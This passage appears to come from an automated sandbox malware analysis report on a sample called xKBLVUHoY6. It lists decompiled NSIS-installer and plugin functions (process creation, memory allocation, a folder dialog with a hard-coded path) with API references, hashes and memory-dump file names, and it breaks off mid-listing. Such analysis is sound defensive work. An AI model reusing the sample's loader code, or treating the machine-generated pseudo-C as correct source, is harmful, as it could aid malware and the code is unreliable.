				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 484c1fb7531d88e09ef65b29159250032d25401e38421a99c1db0096a302077e
Instruction ID: dab120aab1e819a0f3e7a590800bcc330433e48d8fa1e5c71f26214da8b737bd
Opcode Fuzzy Hash: 484c1fb7531d88e09ef65b29159250032d25401e38421a99c1db0096a302077e
Instruction Fuzzy Hash: B4D01272B08110DBDB11DBA8AA48B9D72A4AB50364B208537D111F61D0E6B9C5559619

Uniqueness

Uniqueness Score: -1.00%

Function 004044AF Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044AF(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x4291f8;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004044af
0x004044b6
0x004044c1
0x00000000
0x004044c1
0x004044c7

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
Instruction ID: 22c14ff0de7d99e8655fd7423acc63eaa31bea8074cc9abcc6b2c74ee929f0f7
Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
Instruction Fuzzy Hash: 54C09B71740706BBEE608F519D49F1777586750700F298579B755F60D0C674E410DA1C

Uniqueness

Uniqueness Score: -1.00%

Function 00404498 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404498(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a228, 0x28, _a4, 1); // executed
				return _t2;
			}

0x004044a6
0x004044ac

APIs

SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19

Uniqueness

Uniqueness Score: -1.00%

Function 004034AF Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034AF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004034bd
0x004034c3

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00404485 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404485(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x423704, _a4); // executed
				return _t2;
			}

0x0040448f
0x00404495

APIs

KiUserCallbackDispatcher.NTDLL(?,0040425C), ref: 0040448F

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D

Uniqueness

Uniqueness Score: -1.00%

Function 6E552B98 Relevance: 1.4, APIs: 1, Instructions: 143
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E6E552B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				void* _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x6e555050 != 0 && E6E552ADB(_a4) == 0) {
					 *0x6e555054 = _t93;
					if( *0x6e55504c != 0) {
						_t93 =  *0x6e55504c;
					} else {
						E6E5530C0(E6E552AD5(), __ecx);
						 *0x6e55504c = _t93;
					}
				}
				_t28 = E6E552B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E6E552AFD();
					_t72 = _a4;
					_t79 =  *0x6e555058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x6e555058 = _t72;
					E6E552AF7();
					_t33 = VirtualAlloc(??, ??, ??, ??); // executed
					 *0x6e555034 = _t33;
					 *0x6e555038 = _t79;
					if( *0x6e555050 != 0 && E6E552ADB( *0x6e555058) == 0) {
						 *0x6e55504c = _t94;
						_t94 =  *0x6e555054;
					}
					_t80 =  *0x6e555058;
					_a4 = _t80;
					 *0x6e555058 =  *((intOrPtr*)(E6E552AFD() + _t80));
					_t37 = E6E552AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E6E552B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E6E552B14() + _a4 + _v8);
							_push(E6E552B1E());
							if( *0x6e555050 <= 0 || E6E552ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x6e55504c =  *0x6e55504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x6e555058;
					if( *0x6e555058 == 0) {
						 *0x6e55504c = 0;
					}
					E6E552B42(_t107, _a4,  *0x6e555034,  *0x6e555038);
					return _a4;
				}
				_push(E6E552B14() + _a4);
				_t56 = E6E552B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E6E552B26();
				_t87 = E6E552B22();
				_t90 = E6E552B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x6e552ba8
0x6e552bb9
0x6e552bc6
0x6e552bda
0x6e552bc8
0x6e552bcd
0x6e552bd2
0x6e552bd2
0x6e552bc6
0x6e552be3
0x6e552be8
0x6e552bee
0x6e552c32
0x6e552c32
0x6e552c37
0x6e552c3c
0x6e552c42
0x6e552c44
0x6e552c4a
0x6e552c57
0x6e552c59
0x6e552c5e
0x6e552c6b
0x6e552c7e
0x6e552c84
0x6e552c8a
0x6e552c8b
0x6e552c91
0x6e552c9d
0x6e552ca3
0x6e552cab
0x6e552cac
0x6e552caf
0x6e552cba
0x6e552cbc
0x6e552cc8
0x6e552cce
0x6e552cd6
0x6e552d02
0x6e552d03
0x6e552d05
0x6e552d09
0x6e552d09
0x6e552d10
0x6e552ce6
0x6e552ce6
0x6e552ce7
0x6e552cf5
0x6e552cfe
0x6e552cfe
0x6e552cd6
0x6e552cba
0x6e552d12
0x6e552d19
0x6e552d1b
0x6e552d1b
0x6e552d34
0x6e552d42
0x6e552d42
0x6e552bf9
0x6e552bfa
0x6e552bff
0x6e552c03
0x6e552c08
0x6e552c1c
0x6e552c1d
0x6e552c1e
0x6e552c20
0x6e552c25
0x6e552c27
0x6e552c27
0x6e552c2a
0x6e552c30
0x00000000

APIs

VirtualAlloc.KERNELBASE(00000000), ref: 6E552C57

Memory Dump Source

Source File: 00000000.00000002.1491224488.000000006E551000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E550000, based on PE: true

Associated: 00000000.00000002.1491166706.000000006E550000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491295904.000000006E554000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491349838.000000006E556000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e550000_xKBLVUHoY6.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5d90f6742a98805a52d7cd933eb5f99f6b212bceb087749b6e7f7156d06ad28d
Instruction ID: d897f2e315fa7388f588d182fafc41bf5eda6e0aab4f1ed5ee08521c7b6edae0
Opcode Fuzzy Hash: 5d90f6742a98805a52d7cd933eb5f99f6b212bceb087749b6e7f7156d06ad28d
Instruction Fuzzy Hash: 33415D79504704EFDF11DFE4D985B9937FCEB86368F218827E60487320DB39A8A19B91

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401FA4(void* __ecx) {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t17 = __ecx;
				_t19 = E00402DA6(_t15);
				E00405569(0xffffffeb, _t7); // executed
				_t9 = E00405AEA(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E0040697F(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E0040644E( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401fa4
0x00401faa
0x00401faf
0x00401fb5
0x00401fba
0x00401fbe
0x0040292e
0x00401fc4
0x00401fc7
0x00401fca
0x00401fd2
0x00401fe1
0x00401fe3
0x00401fe3
0x00401fd4
0x00401fd8
0x00401fd8
0x00401fd2
0x00401fea
0x00401feb
0x00401feb
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405569: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
Part of subcall function 00405569: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,004033ED), ref: 004055C4
Part of subcall function 00405569: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx50C8.tmp\System.dll), ref: 004055D6
Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Part of subcall function 00405AEA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
Part of subcall function 00405AEA: CloseHandle.KERNEL32(?), ref: 00405B20

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
Part of subcall function 0040697F: GetExitCodeProcess.KERNEL32(?,?), ref: 004069B2

Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: f63ea1c2bff24e9e69c4bfa64d3b71e71d4d0182849d0b2c143de8970cb27b64
Instruction ID: 8c0427486d29053335645041865d96f0af5997519b71f4a23b4502285a2a7229
Opcode Fuzzy Hash: f63ea1c2bff24e9e69c4bfa64d3b71e71d4d0182849d0b2c143de8970cb27b64
Instruction Fuzzy Hash: 4AF09072904012EBCB21ABA59994E9E72A4DF00318F25413BE102B21E1D77C4E528AAE

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402D84(_t7);
				 *((intOrPtr*)(_t13 - 0x10)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402c2d
0x00402c39

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 69496f19bc6ab9971bad014e7fdfb58ea689034bd31df4dea0a06c0f69c6c777
Instruction ID: 13549e56dd5f321cd39d4a1c5d69ee1d893e1909e6cc3dd33a15c81121e8da7c
Opcode Fuzzy Hash: 69496f19bc6ab9971bad014e7fdfb58ea689034bd31df4dea0a06c0f69c6c777
Instruction Fuzzy Hash: 7CD05E73A141018BD714EBB8BE8545E73A8EB503193208837D402E1191E67888564618

Uniqueness

Uniqueness Score: -1.00%

Function 6E5512BB Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E5512BB() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x6e55506c +  *0x6e55506c); // executed
				return _t3;
			}

0x6e5512c5
0x6e5512cb

APIs

GlobalAlloc.KERNELBASE(00000040,?,6E5512DB,?,6E55137F,00000019,6E5511CA,-000000A0), ref: 6E5512C5

Memory Dump Source

Source File: 00000000.00000002.1491224488.000000006E551000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E550000, based on PE: true

Associated: 00000000.00000002.1491166706.000000006E550000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491295904.000000006E554000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491349838.000000006E556000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e550000_xKBLVUHoY6.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 90b5aac18090525a272a4213e53bd8d51f57a5fb8d37b6cc855b37acb5bc1381
Instruction ID: 9343ffc0b6a95696e37502dc97a50c468bba875c9439183a6b30e51050f5d639
Opcode Fuzzy Hash: 90b5aac18090525a272a4213e53bd8d51f57a5fb8d37b6cc855b37acb5bc1381
Instruction Fuzzy Hash: F1B01270A04600DFEE008BA4CC06F343364E701311F054000F601C4190C9205C148534

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404954 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404954(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x4226e0; // 0x56b904
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B4B(0x3fb, _t146);
					E0040678E(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B4B(0x3fb, _t146);
							if(E00405EDE(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406507(0x4216d8, _t146);
							_t87 = E004068D4(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406507(0x4216d8, _t146);
								_t89 = E00405E81(0x4216d8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216d8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216d8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4216d8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E22(0x4216d8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216d8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404DF1(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x4291fc + 0x10)) != _t158) {
									E00404DD9(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216c8);
									} else {
										E00404D10(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a2c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404485(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x4236f8 == _t158) {
									E004048AD();
								}
								 *0x4236f8 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423708;
							_v60 = E00404CAA;
							_v56 = _t146;
							_v68 = E00406544(_t146, 0x423708, _t167, 0x421ee0, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405DD6(_t146);
								_t125 =  *((intOrPtr*)( *0x42a230 + 0x11c));
								if( *((intOrPtr*)( *0x42a230 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Lagerhals\\Territorially") {
									E00406544(_t146, 0x423708, _t167, 0, _t125);
									if(lstrcmpiW(0x4281c0, 0x423708) != 0) {
										lstrcatW(_t146, 0x4281c0);
									}
								}
								 *0x4236f8 =  *0x4236f8 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E4D(_t146) != 0 && E00405E81(_t146) == 0) {
						E00405DD6(_t146);
					}
					 *0x4291f8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404463(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404463(_t167);
					E00404498(_t166);
					_t138 = E004068D4(8);
					if(_t138 == 0) {
						L53:
						return E004044CA(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404954
0x0040495a
0x00404960
0x0040496d
0x0040497b
0x0040497e
0x00404986
0x0040498c
0x0040498c
